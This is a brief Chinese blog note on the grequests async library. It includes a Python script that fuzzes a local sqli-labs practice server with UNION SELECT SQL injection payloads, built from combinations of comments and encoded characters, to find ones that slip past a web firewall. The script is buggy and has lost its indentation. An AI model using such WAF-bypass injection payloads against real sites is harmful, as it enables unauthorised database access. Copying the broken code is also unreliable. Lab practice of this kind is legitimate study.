python grequests极限_python异步库grequests使用
封装了gevent+requests的一个库
本来想用scrapy框架来fuzz测试的(scrapy也是异步的),但和grequests的情况相同,本机测试搭建的服务器,遭不住。。。
ok,记录下grequests
import grequests
urls = ["http://www.baidu.com", "http://www.qq.com", "http://www.baidu.com"]
req = (grequests.get(u) for u in urls)
resp = grequests.map(req)
for i in resp:
print(i.text)
print(i.url)
fuzz脚本:
#coding=utf-8
import grequests
fuzz_zs = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00','/*','*/','/*!','?','*','=','`','~','!','@','%','.','-','+','|','%00','%20' ,'%09', '%0a', '%0b', '%0c', '%0d' , '%a0' ,'/**/']
fuzz_sz = ['', ' ','0','1','2','3','4','5','6','7','8','9']
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j","%0k","%0l","%0m","%0n", "%0o","%0p","%0q","%0r","%0s","%0t","%0u","%0v","%0w","%0x","%0y","%0z"]
fuzz = fuzz_ch + fuzz_sz + fuzz_zs
url="http://192.168.182.156/sqli-labs-master/Less-1/?id=1"
for i in fuzz:
for j in fuzz:
for k in fuzz:
url=url+ "' /*!union" + i+j+k+"select*/" + " 1,2,3 --+"
urls.appemd(url)
aaa=aaa+1
if aaa==1000:
rets=grequests.map(urls)
for ret in rets:
s=ret.text
if "网站防火墙" not in s:
if "Your Login name:Dumb" in s:
print(ret.url)
aaa=0
测试最后是414码居多,服务器单时间内处理的过多线程,但是处理不过cpu那样的速度
2019.4.29